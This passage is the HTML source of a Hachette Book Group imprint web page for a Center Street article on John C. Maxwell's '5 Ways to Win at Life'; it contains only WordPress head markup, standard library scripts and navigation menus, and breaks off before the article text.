<!DOCTYPE html>
<html lang="en-US">
	<head>
		<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="google-site-verification" content="85wAGAWAuJVKY63Av9XQL_d8G9S3oJQ9FIKRL_p_NnA" />
<meta name="msvalidate.01" content="0051B8D8511A2B9F4DE35FC989DC79B8" />
<meta name="p:domain_verify" content="d17b1f4fbc23ea8e105438f14592909f"/>
<link rel="profile" href="http://gmpg.org/xfn/11">
<title>5 Ways to Win at Life from John C. Maxwell | Center Street</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//static.srcspot.com' />
<link rel='dns-prefetch' href='//launcher.zo.la' />
<link rel='dns-prefetch' href='//platform.twitter.com' />
<link rel='dns-prefetch' href='//unpkg.com' />
<link rel='dns-prefetch' href='//cdnjs.cloudflare.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Feed" href="https://www.centerstreet.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Comments Feed" href="https://www.centerstreet.com/comments/feed/" />
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.centerstreet.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css' href='https://www.centerstreet.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mediaelement-css' href='https://www.centerstreet.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css' href='https://www.centerstreet.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='elasticpress-related-posts-block-css' href='https://www.centerstreet.com/wp-content/mu-plugins/search/elasticpress/dist/css/related-posts-block-styles.min.css?ver=3.6.5' type='text/css' media='all' />
<link rel='stylesheet' id='classic-theme-styles-css' href='https://www.centerstreet.com/wp-includes/css/classic-themes.min.css?ver=1' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>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</style>
<style id='hachette-plugin-campaign-view-variables-inline-css' type='text/css'>
	.campaign-view {
		--campaign-view-font-family: 'Source Sans Pro', helvetica, sans-serif, sans-serif;
		--campaign-view-primary-color: inherit;
		--campaign-view-secondary-color: inherit;
	}
</style>
<link rel='stylesheet' id='hachette-site-css-css' href='https://www.centerstreet.com/wp-content/themes/hachette/static/css/hachette-site.min.css?ver=fee10e6bdfd4a29dad04' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-all-domains-css-css' href='https://www.centerstreet.com/wp-content/themes/hachette-book-group/client/build/css/lens-hbg-all-domains.css?ver=b71796abef6a8c169c32' type='text/css' media='all' />
<link rel='stylesheet' id='hachette-lens-css-css' href='https://www.centerstreet.com/wp-content/themes/hachette-book-group/client/build/css/lens-center-street.css?ver=b71796abef6a8c169c32' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-google-fonts-source-sans-css' href='https://fonts.googleapis.com/css?family=Source+Sans+Pro%3A400%2C600%2C700&#038;ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-leaflet-css-css' href='https://unpkg.com/leaflet@1.7.1/dist/leaflet.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css' href='https://www.centerstreet.com/wp-content/mu-plugins/jetpack-11.6/css/jetpack.css?ver=11.6' type='text/css' media='all' />
<script type='text/javascript' src='https://www.centerstreet.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.centerstreet.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/Swiper/8.2.4/swiper-bundle.min.js?ver=8.2.4' id='hbg-swiper-js-js'></script>
<script type='text/javascript' src='https://static.srcspot.com/libs/tamara.js?ver=0.1.0' id='mimecast-script-js'></script>
<script type='text/javascript' src='https://launcher.zo.la/assets/zbwidget-launcher-0.1.0.js?ver=0.1.0' id='zola-widget-launcher-js'></script>
<script type='text/javascript' src='https://unpkg.com/leaflet@1.7.1/dist/leaflet.js?ver=1.0' id='hachette-leaflet-js-js'></script>
<link rel="https://api.w.org/" href="https://www.centerstreet.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.centerstreet.com/wp-json/wp/v2/posts/1289048" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.centerstreet.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.centerstreet.com/wp-includes/wlwmanifest.xml" />
<meta name="generator" content="WordPress 6.1.1" />
<link rel="canonical" href="https://www.centerstreet.com/articles/5-ways-to-win-at-life-from-john-c-maxwell/" />
<link rel='shortlink' href='https://www.centerstreet.com/?p=1289048' />
<link rel="alternate" type="application/json+oembed" href="https://www.centerstreet.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.centerstreet.com%2Farticles%2F5-ways-to-win-at-life-from-john-c-maxwell%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.centerstreet.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.centerstreet.com%2Farticles%2F5-ways-to-win-at-life-from-john-c-maxwell%2F&#038;format=xml" />
	<style>img#wpstats{display:none}</style>
					<script>
				window.dataLayer = window.dataLayer || [];
				window.dataLayer.push(
					{"imprint":"center-street","genre":"","genreSecondary":"","genreTertiary":"","format":""}				);
			</script>
		
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="5 Ways to Win at Life from John C. Maxwell" />
<meta property="og:url" content="https://www.centerstreet.com/articles/5-ways-to-win-at-life-from-john-c-maxwell/" />
<meta property="og:description" content="How do you define winning at life? Is it having a lot of money? Is it being famous? Or is it growing into your greatest potential and purpose? John Maxwell is here to help you figure out what succe…" />
<meta property="article:published_time" content="2022-12-08T19:53:37+00:00" />
<meta property="article:modified_time" content="2022-12-08T19:53:37+00:00" />
<meta property="og:site_name" content="Center Street" />
<meta property="og:image" content="https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png" />
<meta property="og:image:width" content="2400" />
<meta property="og:image:height" content="668" />
<meta property="og:image:alt" content="" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:text:title" content="5 Ways to Win at Life from John C. Maxwell" />
<meta name="twitter:image" content="https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->
<link rel="icon" href="https://www.centerstreet.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=32%2C32" sizes="32x32" />
<link rel="icon" href="https://www.centerstreet.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=192%2C192" sizes="192x192" />
<link rel="apple-touch-icon" href="https://www.centerstreet.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=180%2C180" />
<meta name="msapplication-TileImage" content="https://www.centerstreet.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=270%2C270" />
		<style type="text/css" id="wp-custom-css">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</style>
			</head>
	<body class="post-template-default single single-post postid-1289048 single-format-standard centerstreet">
				<div id="page" class="site single-post page imprint">
			<header class="site-header">
	<nav class="site-header__nav swappable" data-swap-location=".imprint-header__menu" data-swap-method="append" data-swap-max="m">
		<a href="https://www.hachettebookgroup.com/">
			<div class="site-header__desktop-logo imprint__global-logo ">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-3565073011  desc-hachette-logo-3950486453">
	<title id="title-hachette-logo-3565073011">Hachette Logo</title>
	<desc id="desc-hachette-logo-3950486453">Hachette Logo</desc>
	<polygon role="presentation" class="logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
	<polygon role="presentation" class="logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
			</div>
		</a>
		<div class="menu-imprint-nav-container"><ul id="menu-hachette-primary-menu" class="menu site-header__menu" data-toggle-element="site-header__mobile-menu" data-toggle-block="site-header__mobile-menu"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genres/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Genres">Genres</a><span id="expand-site-header__sub-menu-523563810" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-523563810" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-523563810" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3393151188  desc-arrow-3117825397">
	<title id="titlet-arrow-3393151188">Arrow Icon</title>
	<desc id="desc-arrow-3117825397">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-523563810" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-523563810"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.centerstreet.com/genre-category/childrens-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Children&#039;s Books">Children&#039;s Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.centerstreet.com/genre-category/cooking/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Cooking">Cooking</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.centerstreet.com/genre-category/fiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Fiction">Fiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.centerstreet.com/genre-category/mind-body-spirit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mind, Body, Spirit">Mind, Body, Spirit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.centerstreet.com/genre-category/mystery-thriller/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mystery &amp; Thriller">Mystery &amp; Thriller</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.centerstreet.com/genre-category/nonfiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Nonfiction">Nonfiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.centerstreet.com/genre-category/romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Romance">Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.centerstreet.com/genre-category/sci-fi-fantasy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Sci-Fi &amp; Fantasy">Sci-Fi &amp; Fantasy</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.centerstreet.com/genre-category/teen-young-adult/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Teen &amp; Young Adult">Teen &amp; Young Adult</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.centerstreet.com/genre-category/travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Travel">Travel</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Authors">Authors</a><span id="expand-site-header__sub-menu-53791419" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-53791419" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-53791419" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1265802375  desc-arrow-3994921967">
	<title id="titlet-arrow-1265802375">Arrow Icon</title>
	<desc id="desc-arrow-3994921967">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-53791419" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-53791419"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Our Authors">Our Authors</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-events/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Events">Author Events</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/imprints/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Imprints">Imprints</a><span id="expand-site-header__sub-menu-556353976" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-556353976" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-556353976" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-802894855  desc-arrow-1867746613">
	<title id="titlet-arrow-802894855">Arrow Icon</title>
	<desc id="desc-arrow-1867746613">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-556353976" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-556353976"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Grand Central Publishing">Grand Central Publishing</a><span id="expand-site-header__sub-menu-1405792653" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1405792653" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1405792653" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3912274715  desc-arrow-2748146324">
	<title id="titlet-arrow-3912274715">Arrow Icon</title>
	<desc id="desc-arrow-2748146324">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1405792653" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1405792653"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/balance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Balance">Balance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/forever/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Forever / Forever Yours">Forever / Forever Yours</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/legacy-lit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Legacy Lit">Legacy Lit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/twelve/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Twelve">Twelve</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/orbit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit Publishing">Orbit Publishing</a><span id="expand-site-header__sub-menu-1328506385" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1328506385" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1328506385" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-447584284  desc-arrow-3528245726">
	<title id="titlet-arrow-447584284">Arrow Icon</title>
	<desc id="desc-arrow-3528245726">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1328506385" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1328506385"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.centerstreet.com/imprint/orbit/page/orbit-catalog/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit">Orbit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/redhook/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Redhook">Redhook</a></span></li>	</ul>
</li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-audio/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Audio">Hachette Audio</a></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Nashville">Hachette Nashville</a><span id="expand-site-header__sub-menu-889588309" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-889588309" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-889588309" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2048612960  desc-arrow-2796847903">
	<title id="titlet-arrow-2048612960">Arrow Icon</title>
	<desc id="desc-arrow-2796847903">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-889588309" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-889588309"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.centerstreet.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Center Street">Center Street</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/faithwords/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="FaithWords">FaithWords</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/worthy-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Worthy Books">Worthy Books</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown and Company">Little, Brown and Company</a><span id="expand-site-header__sub-menu-1478531288" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1478531288" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1478531288" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1604542054  desc-arrow-3076642466">
	<title id="titlet-arrow-1604542054">Arrow Icon</title>
	<desc id="desc-arrow-3076642466">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1478531288" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1478531288"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/back-bay-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Back Bay Books">Back Bay Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/little-brown-spark/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little Brown Spark">Little Brown Spark</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/mulholland-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mulholland Books">Mulholland Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/voracious/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Voracious">Voracious</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown Books for Young Readers">Little, Brown Books for Young Readers</a><span id="expand-site-header__sub-menu-867703419" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-867703419" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-867703419" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-4127666804  desc-arrow-3062269904">
	<title id="titlet-arrow-4127666804">Arrow Icon</title>
	<desc id="desc-arrow-3062269904">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-867703419" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-867703419"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/christy-ottaviano-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Christy Ottaviano Books">Christy Ottaviano Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/jimmy-patterson/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="JIMMY Patterson">JIMMY Patterson</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/lb-kids/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="LB Kids">LB Kids</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/poppy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Poppy">Poppy</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.workman.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman Publishing">Workman Publishing</a><span id="expand-site-header__sub-menu-1880454145" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1880454145" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1880454145" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-196063100  desc-arrow-3492555012">
	<title id="titlet-arrow-196063100">Arrow Icon</title>
	<desc id="desc-arrow-3492555012">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1880454145" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1880454145"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman">Workman</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.pageaday.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman Calendars">Workman Calendars</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/kids" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman Kids">Workman Kids</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/imprints/algonquin" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Algonquin Books of Chapel Hill">Algonquin Books of Chapel Hill</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/imprints/algonquin-young-readers" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Algonquin Young Readers">Algonquin Young Readers</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/imprints/artisan" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Artisan">Artisan</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.timberpress.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Timber Press">Timber Press</a></span></li><li class="site-header__menu-item"><span 